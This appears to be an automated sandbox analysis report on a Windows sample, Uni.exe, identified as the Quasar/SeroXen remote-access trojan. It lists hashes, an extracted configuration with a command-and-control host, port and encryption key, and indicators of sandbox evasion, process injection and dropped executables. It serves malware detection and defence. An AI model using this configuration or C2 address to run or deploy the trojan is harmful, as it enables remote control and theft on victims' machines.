Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-12-2024 06:52
Static task
static1
Behavioral task
behavioral1
Sample
Uni.exe
Resource
win10v2004-20241007-en
General
-
Target
Uni.exe
-
Size
8.2MB
-
MD5
917c0479804b76ae493bad95bf0c7710
-
SHA1
7441c9042a3db3642416bd1fbee680e41fed6000
-
SHA256
00f80131b00550bd8cbc45ea7f064b75c4b19fb2df93200f359593c3f5fc54f4
-
SHA512
93ca248c62caa51a81a5156674ce4eceddc7c2bfd9331a8d522528d80b0d42042957e152e63021f9c3c6696ec76cbaec2ec5bc2820f5c0caf4976040e99d3aa8
-
SSDEEP
196608:szdoXA+DYyx8t5KwwFdR3TNpiCHK9MIuBRR23pyHVvGAE+:szUDh8t55wFd1NckKKH+3pyHU
Malware Config
Extracted
quasar
1.0.0.0
v2.2.1 | SeroXen
VIPEEK1990-25013.portmap.host:25013
7018d402-47e5-4cb4-a786-2ea02c04bce5
-
encryption_key
B25AE15F5F63DA9A5796B857943A95D816F98892
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/memory/4852-65-0x000001F278420000-0x000001F278BEA000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description pid Process procid_target PID 3388 created 3872 3388 WerFault.exe 123 PID 5528 created 5792 5528 WerFault.exe 128 PID 1992 created 4500 1992 WerFault.exe 132 PID 184 created 2208 184 WerFault.exe 135 -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 456 created 616 456 Uni.bat.exe 5 PID 4852 created 616 4852 $sxr-powershell.exe 5 PID 4852 created 616 4852 $sxr-powershell.exe 5 PID 456 created 616 456 Uni.bat.exe 5 PID 4852 created 616 4852 $sxr-powershell.exe 5 PID 4852 created 616 4852 $sxr-powershell.exe 5 PID 5940 created 3872 5940 svchost.exe 123 PID 4852 created 616 4852 $sxr-powershell.exe 5 PID 5940 created 5792 5940 svchost.exe 128 PID 4852 created 616 4852 $sxr-powershell.exe 5 PID 5940 created 4500 5940 svchost.exe 132 PID 5940 created 2208 5940 svchost.exe 135 PID 4852 created 616 4852 $sxr-powershell.exe 5 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation $sxr-mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation Uni.bat.exe -
Executes dropped EXE 5 IoCs
pid Process 456 Uni.bat.exe 2100 $sxr-mshta.exe 3228 $sxr-cmd.exe 4852 $sxr-powershell.exe 1792 $sxr-powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Uni.exe -
Hide Artifacts: Hidden Window 1 TTPs 2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 1792 $sxr-powershell.exe 4852 $sxr-powershell.exe -
Drops file in System32 directory 9 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe -
Suspicious use of SetThreadContext 18 IoCs
description pid Process procid_target PID 456 set thread context of 408 456 Uni.bat.exe 94 PID 456 set thread context of 1948 456 Uni.bat.exe 97 PID 4852 set thread context of 400 4852 $sxr-powershell.exe 108 PID 4852 set thread context of 4576 4852 $sxr-powershell.exe 109 PID 4852 set thread context of 4540 4852 $sxr-powershell.exe 111 PID 4852 set thread context of 2020 4852 $sxr-powershell.exe 112 PID 456 set thread context of 5168 456 Uni.bat.exe 117 PID 456 set thread context of 3996 456 Uni.bat.exe 119 PID 4852 set thread context of 3892 4852 $sxr-powershell.exe 120 PID 4852 set thread context of 5912 4852 $sxr-powershell.exe 121 PID 4852 set thread context of 5368 4852 $sxr-powershell.exe 122 PID 4852 set thread context of 3872 4852 $sxr-powershell.exe 123 PID 4852 set thread context of 5792 4852 $sxr-powershell.exe 128 PID 4852 set thread context of 3212 4852 $sxr-powershell.exe 130 PID 4852 set thread context of 4500 4852 $sxr-powershell.exe 132 PID 4852 set thread context of 2208 4852 $sxr-powershell.exe 135 PID 4852 set thread context of 5944 4852 $sxr-powershell.exe 138 PID 4852 set thread context of 5764 4852 $sxr-powershell.exe 141 -
Drops file in Windows directory 7 IoCs
description ioc Process File opened for modification C:\Windows\$sxr-powershell.exe Uni.bat.exe File created C:\Windows\$sxr-mshta.exe Uni.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe Uni.bat.exe File created C:\Windows\$sxr-cmd.exe Uni.bat.exe File opened for modification C:\Windows\$sxr-cmd.exe Uni.bat.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\$sxr-powershell.exe Uni.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 5180 3872 WerFault.exe 123 4976 2208 WerFault.exe 135 -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 448 cmd.exe 5164 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 1 IoCs
pid Process 4012 taskkill.exe -
Modifies data under HKEY_USERS 14 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 16 Dec 2024 06:53:44 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={1CEB11FC-AAA2-4D46-AC7F-70CB91DA5A1F}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1734332023" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5164 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 456 Uni.bat.exe 456 Uni.bat.exe 456 Uni.bat.exe 408 dllhost.exe 408 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 408 dllhost.exe 408 dllhost.exe 456 Uni.bat.exe 456 Uni.bat.exe 4852 $sxr-powershell.exe 4852 $sxr-powershell.exe 4852 $sxr-powershell.exe 4852 $sxr-powershell.exe 400 dllhost.exe 400 dllhost.exe 400 dllhost.exe 4576 dllhost.exe 4576 dllhost.exe 4576 dllhost.exe 4576 dllhost.exe 400 dllhost.exe 400 dllhost.exe 4852 $sxr-powershell.exe 4852 $sxr-powershell.exe 1792 $sxr-powershell.exe 1792 $sxr-powershell.exe 4852 $sxr-powershell.exe 4540 dllhost.exe 4540 dllhost.exe 1792 $sxr-powershell.exe 1792 $sxr-powershell.exe 2020 dllhost.exe 2020 dllhost.exe 2020 dllhost.exe 2020 dllhost.exe 4540 dllhost.exe 4540 dllhost.exe 4540 dllhost.exe 4540 dllhost.exe 2020 dllhost.exe 2020 dllhost.exe 4540 dllhost.exe 4540 dllhost.exe 2020 dllhost.exe 2020 dllhost.exe 4540 dllhost.exe 4540 dllhost.exe 2020 dllhost.exe 2020 dllhost.exe 4540 dllhost.exe 4540 dllhost.exe 2020 dllhost.exe 2020 dllhost.exe 4540 dllhost.exe 4540 dllhost.exe 2020 dllhost.exe 2020 dllhost.exe 4540 dllhost.exe 4540 dllhost.exe 2020 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 456 Uni.bat.exe Token: SeDebugPrivilege 456 Uni.bat.exe Token: SeDebugPrivilege 408 dllhost.exe Token: SeDebugPrivilege 1948 dllhost.exe Token: SeDebugPrivilege 4852 $sxr-powershell.exe Token: SeDebugPrivilege 4852 $sxr-powershell.exe Token: SeDebugPrivilege 400 dllhost.exe Token: SeDebugPrivilege 4576 dllhost.exe Token: SeDebugPrivilege 1792 $sxr-powershell.exe Token: SeDebugPrivilege 4852 $sxr-powershell.exe Token: SeDebugPrivilege 4540 dllhost.exe Token: SeDebugPrivilege 2020 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2052 svchost.exe Token: SeIncreaseQuotaPrivilege 2052 svchost.exe Token: SeSecurityPrivilege 2052 svchost.exe Token: SeTakeOwnershipPrivilege 2052 svchost.exe Token: SeLoadDriverPrivilege 2052 svchost.exe Token: SeSystemtimePrivilege 2052 svchost.exe Token: SeBackupPrivilege 2052 svchost.exe Token: SeRestorePrivilege 2052 svchost.exe Token: SeShutdownPrivilege 2052 svchost.exe Token: SeSystemEnvironmentPrivilege 2052 svchost.exe Token: SeUndockPrivilege 2052 svchost.exe Token: SeManageVolumePrivilege 2052 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2052 svchost.exe Token: SeIncreaseQuotaPrivilege 2052 svchost.exe Token: SeSecurityPrivilege 2052 svchost.exe Token: SeTakeOwnershipPrivilege 2052 svchost.exe Token: SeLoadDriverPrivilege 2052 svchost.exe Token: SeSystemtimePrivilege 2052 svchost.exe Token: SeBackupPrivilege 2052 svchost.exe Token: SeRestorePrivilege 2052 svchost.exe Token: SeShutdownPrivilege 2052 svchost.exe Token: SeSystemEnvironmentPrivilege 2052 svchost.exe Token: SeUndockPrivilege 2052 svchost.exe Token: SeManageVolumePrivilege 2052 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2052 svchost.exe Token: SeIncreaseQuotaPrivilege 2052 svchost.exe Token: SeSecurityPrivilege 2052 svchost.exe Token: SeTakeOwnershipPrivilege 2052 svchost.exe Token: SeLoadDriverPrivilege 2052 svchost.exe Token: SeSystemtimePrivilege 2052 svchost.exe Token: SeBackupPrivilege 2052 svchost.exe Token: SeRestorePrivilege 2052 svchost.exe Token: SeShutdownPrivilege 2052 svchost.exe Token: SeSystemEnvironmentPrivilege 2052 svchost.exe Token: SeUndockPrivilege 2052 svchost.exe Token: SeManageVolumePrivilege 2052 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2052 svchost.exe Token: SeIncreaseQuotaPrivilege 2052 svchost.exe Token: SeSecurityPrivilege 2052 svchost.exe Token: SeTakeOwnershipPrivilege 2052 svchost.exe Token: SeLoadDriverPrivilege 2052 svchost.exe Token: SeSystemtimePrivilege 2052 svchost.exe Token: SeBackupPrivilege 2052 svchost.exe Token: SeRestorePrivilege 2052 svchost.exe Token: SeShutdownPrivilege 2052 svchost.exe Token: SeSystemEnvironmentPrivilege 2052 svchost.exe Token: SeUndockPrivilege 2052 svchost.exe Token: SeManageVolumePrivilege 2052 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2052 svchost.exe Token: SeIncreaseQuotaPrivilege 2052 svchost.exe Token: SeSecurityPrivilege 2052 svchost.exe Token: SeTakeOwnershipPrivilege 2052 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4852 $sxr-powershell.exe 6016 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1928 wrote to memory of 3128 1928 Uni.exe 83 PID 1928 wrote to memory of 3128 1928 Uni.exe 83 PID 3128 wrote to memory of 456 3128 cmd.exe 86 PID 3128 wrote to memory of 456 3128 cmd.exe 86 PID 456 wrote to memory of 408 456 Uni.bat.exe 94 PID 456 wrote to memory of 408 456 Uni.bat.exe 94 PID 456 wrote to memory of 408 456 Uni.bat.exe 94 PID 456 wrote to memory of 408 456 Uni.bat.exe 94 PID 456 wrote to memory of 408 456 Uni.bat.exe 94 PID 456 wrote to memory of 408 456 Uni.bat.exe 94 PID 456 wrote to memory of 408 456 Uni.bat.exe 94 PID 456 wrote to memory of 468 456 Uni.bat.exe 95 PID 456 wrote to memory of 468 456 Uni.bat.exe 95 PID 456 wrote to memory of 468 456 Uni.bat.exe 95 PID 456 wrote to memory of 2304 456 Uni.bat.exe 96 PID 456 wrote to memory of 2304 456 Uni.bat.exe 96 PID 456 wrote to memory of 2304 456 Uni.bat.exe 96 PID 456 wrote to memory of 1948 456 Uni.bat.exe 97 PID 456 wrote to memory of 1948 456 Uni.bat.exe 97 PID 456 wrote to memory of 1948 456 Uni.bat.exe 97 PID 456 wrote to memory of 1948 456 Uni.bat.exe 97 PID 456 wrote to memory of 1948 456 Uni.bat.exe 97 PID 456 wrote to memory of 1948 456 Uni.bat.exe 97 PID 456 wrote to memory of 1948 456 Uni.bat.exe 97 PID 456 wrote to memory of 1948 456 Uni.bat.exe 97 PID 456 wrote to memory of 1948 456 Uni.bat.exe 97 PID 2100 wrote to memory of 3228 2100 $sxr-mshta.exe 105 PID 2100 wrote to memory of 3228 2100 $sxr-mshta.exe 105 PID 3228 wrote to memory of 4852 3228 $sxr-cmd.exe 107 PID 3228 wrote to memory of 4852 3228 $sxr-cmd.exe 107 PID 4852 wrote to memory of 400 4852 $sxr-powershell.exe 108 PID 4852 wrote to memory of 400 4852 $sxr-powershell.exe 108 PID 4852 wrote to memory of 400 4852 $sxr-powershell.exe 108 PID 4852 wrote to memory of 400 4852 $sxr-powershell.exe 108 PID 4852 wrote to memory of 400 4852 $sxr-powershell.exe 108 PID 4852 wrote to memory of 400 4852 $sxr-powershell.exe 108 PID 4852 wrote to memory of 400 4852 $sxr-powershell.exe 108 PID 4852 wrote to memory of 4576 4852 $sxr-powershell.exe 109 PID 4852 wrote to memory of 4576 4852 $sxr-powershell.exe 109 PID 4852 wrote to memory of 4576 4852 $sxr-powershell.exe 109 PID 4852 wrote to memory of 4576 4852 $sxr-powershell.exe 109 PID 4852 wrote to memory of 4576 4852 $sxr-powershell.exe 109 PID 4852 wrote to memory of 4576 4852 $sxr-powershell.exe 109 PID 4852 wrote to memory of 4576 4852 $sxr-powershell.exe 109 PID 4852 wrote to memory of 4576 4852 $sxr-powershell.exe 109 PID 4852 wrote to memory of 4576 4852 $sxr-powershell.exe 109 PID 4852 wrote to memory of 1792 4852 $sxr-powershell.exe 110 PID 4852 wrote to memory of 1792 4852 $sxr-powershell.exe 110 PID 4852 wrote to memory of 4540 4852 $sxr-powershell.exe 111 PID 4852 wrote to memory of 4540 4852 $sxr-powershell.exe 111 PID 4852 wrote to memory of 4540 4852 $sxr-powershell.exe 111 PID 4852 wrote to memory of 4540 4852 $sxr-powershell.exe 111 PID 4852 wrote to memory of 4540 4852 $sxr-powershell.exe 111 PID 4852 wrote to memory of 4540 4852 $sxr-powershell.exe 111 PID 4852 wrote to memory of 4540 4852 $sxr-powershell.exe 111 PID 4852 wrote to memory of 4540 4852 $sxr-powershell.exe 111 PID 4852 wrote to memory of 4540 4852 $sxr-powershell.exe 111 PID 4852 wrote to memory of 2020 4852 $sxr-powershell.exe 112 PID 4852 wrote to memory of 2020 4852 $sxr-powershell.exe 112 PID 4852 wrote to memory of 2020 4852 $sxr-powershell.exe 112 PID 4852 wrote to memory of 2020 4852 $sxr-powershell.exe 112 PID 4852 wrote to memory of 2020 4852 $sxr-powershell.exe 112 PID 4852 wrote to memory of 2020 4852 $sxr-powershell.exe 112 PID 4852 wrote to memory of 2020 4852 $sxr-powershell.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5032 attrib.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:388
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e4fa98cd-ed75-4acb-aba1-704bbcc40cae}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b1cef20f-5cf2-4a3a-9dfb-885f7971a3f3}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:400
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{34148b74-80b5-4a89-96b7-ea5aa6fac7a2}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{844b5796-e60d-41b8-aacd-e0dc055eb923}2⤵PID:5168
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2f2cb252-862c-4f6b-b974-7ec009904eaf}2⤵PID:3892
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{90f8c901-9c14-483d-8fea-91a6cbb6066b}2⤵PID:5368
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{13e9b6b1-7597-49ed-bf6b-c032b69b7d98}2⤵PID:5792
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5792 -s 3083⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2248
-
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{15152cb8-848d-4ac6-800d-4b41103691a5}2⤵PID:4500
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4500 -s 3083⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2328
-
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a0cd966d-49df-4e39-88e5-ca2a85750c37}2⤵PID:5944
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
